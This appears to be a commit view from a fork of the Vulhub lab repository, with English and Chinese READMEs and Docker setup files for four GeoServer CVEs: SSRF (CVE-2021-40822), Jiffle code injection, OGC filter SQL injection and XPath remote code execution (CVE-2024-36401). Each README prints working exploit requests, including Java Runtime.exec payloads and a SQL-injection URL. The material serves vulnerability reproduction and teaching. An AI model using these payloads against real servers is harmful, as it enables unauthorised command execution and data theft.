aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
geoserver/CVE-2021-40822/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 122 KiB

54
geoserver/CVE-2021-40822/README.md Normal file
View File

@@ -0,0 +1,54 @@
# GeoServer Unauthenticated Server-Side Request Forgery (CVE-2021-40822)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
In GeoServer versions prior to 2.19.3, 2.18.5, and 2.17.6, there is a Server-Side Request Forgery (SSRF) vulnerability in the WMS GetMap request. An attacker can exploit this vulnerability to make requests to internal or external services through the GeoServer server.
References:
- <https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf>
- <https://nvd.nist.gov/vuln/detail/CVE-2021-40822>
## Vulnerable Environment
Execute the following command to start a GeoServer 2.19.1 server:
```
docker compose up -d
```
After the server is started, you can browse the default page of GeoServer at `http://your-ip:8080/geoserver`.
## Exploit
The vulnerability exists in the `TestWfsPost` endpoint. An attacker can use the `url` parameter to make the server send requests to arbitrary URLs. The endpoint accepts several parameters:
- `url`: The target URL that GeoServer will send request to
- `body`: The request body to be sent. If this parameter is empty, GeoServer will send a GET request; if it contains any value, GeoServer will send a POST request
- `username`: Username for basic authentication (optional)
- `password`: Password for basic authentication (optional)
Send the following request to the `TestWfsPost` endpoint:
```
POST /geoserver/TestWfsPost HTTP/1.1
Host: internal
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
form_hf_0=&url=http://interal/geoserver/../&body=testtest&username=admin&password=admin
```
Use `google.com` as the target URL, and you will see that response from `google.com` is returned.
![](1.png)
> Note: The host in the `url` parameter must match the `Host` header in your request, otherwise GeoServer will return an error. For example, if the domain in `url` parameter is `internal`, then the `Host` header should also be `internal`.

52
geoserver/CVE-2021-40822/README.zh-cn.md Normal file
View File

@@ -0,0 +1,52 @@
# GeoServer 未授权SSRF漏洞CVE-2021-40822
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
在GeoServer 2.19.3、2.18.5和2.17.6版本之前WMS GetMap请求中存在服务器端请求伪造SSRF漏洞。攻击者可以利用此漏洞通过GeoServer服务器向内部或外部服务发送请求。
参考链接:
- <https://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf>
- <https://nvd.nist.gov/vuln/detail/CVE-2021-40822>
## 漏洞环境
执行如下命令启动一个GeoServer 2.19.1服务器:
```
docker compose up -d
```
服务启动后,你可以在`http://your-ip:8080/geoserver`查看到GeoServer的默认页面。
## 漏洞复现
漏洞存在于TestWfsPost接口中。攻击者可以利用`url`参数使服务器向任意URL发送请求。该接口接受以下参数
- `url`GeoServer将要发送请求的目标URL
- `body`要发送的请求体内容。如果此参数为空GeoServer将发送GET请求如果包含任何值则GeoServer将发送POST请求
- `username`:基础认证的用户名(可选)
- `password`:基础认证的密码(可选)
发送如下请求来复现漏洞:
```
POST /geoserver/TestWfsPost HTTP/1.1
Host: internal
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 96
form_hf_0=&url=http://interal/geoserver/../&body=testtest&username=admin&password=admin
```
比如,使用`google.com`作为目标URL你将看到`google.com`的响应。
![](1.png)
> 注意:`url`参数中的主机名必须与请求中的`Host`头部值相同否则GeoServer会返回错误。例如如果`url`参数中的主机名是`internal`,那么请求中的`Host`头部值也必须是`internal`。

6
geoserver/CVE-2021-40822/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/geoserver:2.19.1
ports:
- "8080:8080"
- "5005:5005"

BIN
geoserver/CVE-2022-24816/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 197 KiB

80
geoserver/CVE-2022-24816/README.md Normal file
View File

@@ -0,0 +1,80 @@
# GeoServer Remote Code Injection caused by JAI-EXT (CVE-2022-24816/CVE-2023-35042)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
GeoServer uses the Jiffle map algebra language provided by JAI-EXT, which allows efficiently execute map algebra over large images. A code injection vulnerability (CVE-2022-24816) has been found in JAI-EXT versions 1.2.21 and earlier, that allows a remote code execution to be performed by properly crafting a Jiffle invocation.
When this vulnerability affects GeoServer, it is also known as [CVE-2023-35042](https://osgeo-org.atlassian.net/browse/GEOS-10458). GeoServer versions 2.20.4, 2.19.6, and 2.18.6 and later have fixed this vulnerability by updating the JAI-EXT dependency.
References:
- <https://www.synacktiv.com/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver>
- <https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx>
- <https://geoserver.org/vulnerability/2022/04/11/geoserver-2-jiffle-jndi-rce.html>
- <https://osgeo-org.atlassian.net/browse/GEOS-10458>
- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24816.yaml>
## Vulnerable Environment
Execute the following command to start a GeoServer 2.17.2 server:
```
docker compose up -d
```
After the server is started, you can browse the default page of GeoServer at `http://your-ip:8080/geoserver`.
## Exploit
The vulnerability exists in the WMS endpoint. An attacker can execute arbitrary Java code by sending a specially crafted request to `/geoserver/wms`. The request should include a malicious Jiffle expression that will be evaluated by the server.
Send a request like this to exploit the vulnerability:
```
POST /geoserver/wms HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 2191
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
```
After sending this request, the malicious Java code embedded in the Jiffle script will be executed by the server. The command output will be captured and returned to the client within a `java.lang.ExceptionInInitializerError` message:
![](1.png)

78
geoserver/CVE-2022-24816/README.zh-cn.md Normal file
View File

@@ -0,0 +1,78 @@
# GeoServer JAI-EXT 导致远程代码注入漏洞CVE-2022-24816/CVE-2023-35042
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
GeoServer 使用 JAI-EXT 提供的 Jiffle 地图代数语言,这让使用者可以高效地在大图像上执行地图查询。在 JAI-EXT 1.2.21 及更早版本中存在一个代码注入漏洞CVE-2022-24816该漏洞允许攻击者通过精心构造的 Jiffle 调用来执行远程代码。
在 GeoServer 中,这个漏洞也被称为 [CVE-2023-35042](https://osgeo-org.atlassian.net/browse/GEOS-10458)。GeoServer 2.20.4、2.19.6 和 2.18.6 及更高版本通过将 JAI-EXT 依赖项更新到 1.2.22 修复了这个问题。
参考链接:
- <https://www.synacktiv.com/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver>
- <https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx>
- <https://geoserver.org/vulnerability/2022/04/11/geoserver-2-jiffle-jndi-rce.html>
- <https://osgeo-org.atlassian.net/browse/GEOS-10458>
- <https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-24816.yaml>
## 漏洞环境
执行如下命令启动一个GeoServer 2.17.2服务器:
```
docker compose up -d
```
服务启动后,你可以在`http://your-ip:8080/geoserver`查看到GeoServer的默认页面。
## 漏洞复现
漏洞存在于WMS接口中。攻击者可以通过向`/geoserver/wms`发送特制的请求来执行任意Java代码。请求中需要包含一个恶意的Jiffle表达式这个表达式将被服务器执行。
发送如下请求来复现漏洞:
```
POST /geoserver/wms HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 2191
<?xml version="1.0" encoding="UTF-8"?>
<wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
<ows:Identifier>ras:Jiffle</ows:Identifier>
<wps:DataInputs>
<wps:Input>
<ows:Identifier>coverage</ows:Identifier>
<wps:Data>
<wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999 316]]></wps:ComplexData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>script</ows:Identifier>
<wps:Data>
<wps:LiteralData>dest = y() - (500); // */ public class Double { public static double NaN = 0; static { try { java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("id").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
</wps:Data>
</wps:Input>
<wps:Input>
<ows:Identifier>outputType</ows:Identifier>
<wps:Data>
<wps:LiteralData>DOUBLE</wps:LiteralData>
</wps:Data>
</wps:Input>
</wps:DataInputs>
<wps:ResponseForm>
<wps:RawDataOutput mimeType="image/tiff">
<ows:Identifier>result</ows:Identifier>
</wps:RawDataOutput>
</wps:ResponseForm>
</wps:Execute>
```
这样数据包中的Jiffle表达式中的Java代码将被服务器执行执行结果将返回在`java.lang.ExceptionInInitializerError`消息中:
![](1.png)

6
geoserver/CVE-2022-24816/docker-compose.yml Normal file
View File

@@ -0,0 +1,6 @@
services:
web:
image: vulhub/geoserver:2.17.2
ports:
- "8080:8080"
- "5005:5005"

BIN
geoserver/CVE-2023-25157/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 90 KiB

41
geoserver/CVE-2023-25157/README.md Normal file
View File

@@ -0,0 +1,41 @@
# GeoServer OGC Filter SQL Injection (CVE-2023-25157)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
In the version prior to 2.22.1 and 2.21.4, there is a SQL injection issue that was found in the filter and function expressions defined by the Open Geospatial Consortium (OGC) standards.
References:
- <https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158>
- <https://github.com/advisories/GHSA-7g5f-wrx8-5ccf>
## Vulnerable environment
Execute following command to start a GeoServer instance 2.22.1:
```
docker compose up -d
```
After the server is started, you can browse the default page of GeoServer at `http://your-ip:8080/geoserver`.
## Exploit
First of all, you have to find a existing workspace that contains PostGIS datastore before you exploit the vulnerability. Vulhub's GeoServer instance already have a PostGIS datastore:
- Workspace name: `vulhub`
- Data store name: `pg`
- Feature type (table) name: `example`
- One of attribute from feature type: `name`
Exploit the server by this simple URL:
```
http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true
```
![](1.png)
As you can see, the version of PostgreSQL has been retrieved from GeoServer by SQL injection.

39
geoserver/CVE-2023-25157/README.zh-cn.md Normal file
View File

@@ -0,0 +1,39 @@
# GeoServer OGC Filter SQL注入漏洞CVE-2023-25157
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
在版本2.22.1和2.21.4及以前多个OGC表达式中均存在SQL注入漏洞。
参考链接:
- <https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158>
- <https://github.com/advisories/GHSA-7g5f-wrx8-5ccf>
## 漏洞环境
执行如下命令启动一个GeoServer 2.22.1
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8080/geoserver`即可查看到GeoServer的首页。
## 漏洞复现
在利用漏洞前需要目标服务器中存在类型是PostGIS的数据空间datastore和工作空间workspace。在Vulhub中已经包含满足条件的工作空间其信息如下
- Workspace name: `vulhub`
- Data store name: `pg`
- Feature type (table) name: `example`
- One of attribute from feature type: `name`
利用这些已知参数发送如下URL即可触发SQL注入漏洞
```
http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true
```
![](1.png)
可见已经使用SQL注入获取到了目标服务器PostgreSQL的版本。

16
geoserver/CVE-2023-25157/docker-compose.yml Normal file
View File

@@ -0,0 +1,16 @@
version: '3'
services:
web:
image: vulhub/geoserver:2.22.1
depends_on:
- postgres
ports:
- "8080:8080"
volumes:
- ./startup.sh:/startup.sh
command: bash /startup.sh
postgres:
image: postgis/postgis:14-3.3-alpine
environment:
- POSTGRES_PASSWORD=vulhub
- POSTGRES_DB=geoserver

28
geoserver/CVE-2023-25157/startup.sh Normal file
View File

@@ -0,0 +1,28 @@
#!/bin/bash
AUTH="admin:geoserver"
/mnt/geoserver/bin/startup.sh &
GEOSERVER_PID=$!
SERVER_ALIVE=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/about/status)
while [ "$SERVER_ALIVE" -ne 200 ]
do
echo "geoserver is not ready yet, waiting for 1 second..."
sleep 1
SERVER_ALIVE=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/about/status)
done
VULHUB_EXISTS=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/workspaces/vulhub)
if [ "${VULHUB_EXISTS}" -eq 200 ]; then
echo "vulhub wordspace already exists"
else
# refer to <https://github.com/geoserver/geoserver-history/blob/master/doc/en/user/source/restconfig/rest-config-examples/rest-config-examples-curl.rst>
curl -XPOST -u "$AUTH" -H "Content-type: application/json" -d '{"workspace":{"name":"vulhub"}}' http://localhost:8080/geoserver/rest/workspaces
curl -u "$AUTH" -XPOST -H 'Content-Type: application/json' \
-d '{"dataStore":{"name":"pg","connectionParameters":{"host":"postgres","port":5432,"database":"geoserver","user":"postgres","passwd":"vulhub","dbtype":"postgis","createDatabase":true}}}' \
http://localhost:8080/geoserver/rest/workspaces/vulhub/datastores
curl -u "$AUTH" -XPOST -H 'Content-Type: application/json' -d '{"featureType":{"name":"example","attributes":{"attribute":[{"name":"name","binding":"java.lang.String"}]}}}' http://localhost:8080/geoserver/rest/workspaces/vulhub/datastores/pg/featuretypes
echo "target geoserver is initialized successfully"
fi
wait $GEOSERVER_PID

BIN
geoserver/CVE-2024-36401/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 103 KiB

BIN
geoserver/CVE-2024-36401/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 28 KiB

BIN
geoserver/CVE-2024-36401/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 169 KiB

80
geoserver/CVE-2024-36401/README.md Normal file
View File

@@ -0,0 +1,80 @@
# GeoServer Unauthenticated Remote Code Execution in Evaluating Property Name Expressions (CVE-2024-36401)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer, multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input against a default GeoServer installation due to unsafely evaluating property names as XPath expressions.
References:
- <https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv>
- <https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w>
- <https://tttang.com/archive/1771/>
- <https://github.com/Warxim/CVE-2022-41852>
## Vulnerable environment
Execute following command to start a GeoServer server 2.23.2:
```
docker compose up -d
```
After server is started, you will see the default page of GeoServer at `http://your-ip:8080/geoserver`.
## Exploit
In the official [vulnerability announcement](https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv), you can find the following content:
> No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.
For example, I gonna to use `GetPropertyValue` to execute evil xpath expression. refer to [official document](https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst), the GET method POC is:
```
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
The POST method POC is:
```
POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>
```
The familiar `java.lang.ClassCastException` error:
![](1.png)
As you can see, `touch /tmp/success1` and `touch /tmp/success2` are both executed successfully.
![](2.png)
It is important to mention that `typeNames` parameter must exist. You can find all the available Types on the web server without login:
![](3.png)

78
geoserver/CVE-2024-36401/README.zh-cn.md Normal file
View File

@@ -0,0 +1,78 @@
# GeoServer 属性名表达式前台代码执行漏洞CVE-2024-36401
GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现,利用 GeoServer 可以方便的发布地图数据,允许用户对特征数据进行更新、删除、插入操作。
在GeoServer 2.25.1 2.24.3 2.23.5版本及以前未登录的任意用户可以通过构造恶意OGC请求在默认安装的服务器中执行XPath表达式进而利用执行Apache Commons Jxpath提供的功能执行任意代码。
参考链接:
- <https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv>
- <https://github.com/geotools/geotools/security/advisories/GHSA-w3pj-wh35-fq8w>
- <https://tttang.com/archive/1771/>
- <https://github.com/Warxim/CVE-2022-41852>
## 漏洞环境
执行如下命令启动一个GeoServer 2.23.2服务器:
```
docker compose up -d
```
服务启动后,你可以在`http://your-ip:8080/geoserver`查看到GeoServer的默认页面。
## 漏洞复现
在官方[漏洞通告](https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv)中提到可以找到漏洞相关的WFS方法
> No public PoC is provided but this vulnerability has been confirmed to be exploitable through WFS GetFeature, WFS GetPropertyValue, WMS GetMap, WMS GetFeatureInfo, WMS GetLegendGraphic and WPS Execute requests.
比如,我这里使用`GetPropertyValue`来执行xpath表达式。参考[官方文档](https://github.com/geoserver/geoserver/blob/2.23.2/doc/en/user/source/services/wfs/reference.rst)我构造了两个POC。基于GET方法的POC
```
GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime(),'touch%20/tmp/success1') HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
```
基于POST方法的POC
```
POST /geoserver/wfs HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.118 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/xml
Content-Length: 356
<wfs:GetPropertyValue service='WFS' version='2.0.0'
xmlns:topp='http://www.openplans.org/topp'
xmlns:fes='http://www.opengis.net/fes/2.0'
xmlns:wfs='http://www.opengis.net/wfs/2.0'>
<wfs:Query typeNames='sf:archsites'/>
<wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'touch /tmp/success2')</wfs:valueReference>
</wfs:GetPropertyValue>
```
熟悉的`java.lang.ClassCastException`错误,说明命令已执行成功。
![](1.png)
进入容器可见,`touch /tmp/success1``touch /tmp/success2`均已成功执行。
![](2.png)
值得注意的是typeNames必须存在我们可以在Web页面中找到当前服务器中的所有Types
![](3.png)

7
geoserver/CVE-2024-36401/docker-compose.yml Normal file
View File

@@ -0,0 +1,7 @@
version: '3'
services:
web:
image: vulhub/geoserver:2.23.2
ports:
- "8080:8080"
- "5005:5005"